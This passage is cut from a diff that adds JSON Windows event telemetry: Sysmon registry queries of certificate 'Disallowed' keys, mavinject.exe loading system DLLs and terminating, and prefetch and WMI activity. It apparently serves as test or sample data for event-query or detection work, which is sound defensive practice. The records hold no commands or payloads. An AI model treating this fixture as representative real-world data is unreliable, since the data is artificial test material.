131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mavinject.exe", + "image_path": 
"C:\\Windows\\System32\\mavinject.exe", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": 
"C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 
131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + 
"unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": 
"{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "process", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "subtype": "terminate", + "timestamp": 131883573571040000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "file", + "file_name": "MAVINJECT.EXE-B106A478.pf", + "file_path": "C:\\Windows\\Prefetch\\MAVINJECT.EXE-B106A478.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573571200016, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "WMIAPSRV.EXE-576286C3.pf", + "file_path": "C:\\Windows\\Prefetch\\WMIAPSRV.EXE-576286C3.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573582140000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "WMIPRVSE.EXE-43972D0F.pf", + "file_path": "C:\\Windows\\Prefetch\\WMIPRVSE.EXE-43972D0F.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573589960000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + 
"pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883573600110000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + "timestamp": 131883573600110000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573788080000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573788080000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573788080000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 
131883573788080000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573788080000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "image_load", + "image_name": "Wldap32.dll", + "image_path": "C:\\Windows\\System32\\Wldap32.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "FirewallAPI.dll", + "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + 
"unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "ntdsapi.dll", + "image_path": "C:\\Windows\\System32\\ntdsapi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "mi.dll", + "image_path": "C:\\Windows\\System32\\mi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "miutils.dll", + "image_path": "C:\\Windows\\System32\\miutils.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "fwbase.dll", + "image_path": "C:\\Windows\\System32\\fwbase.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", 
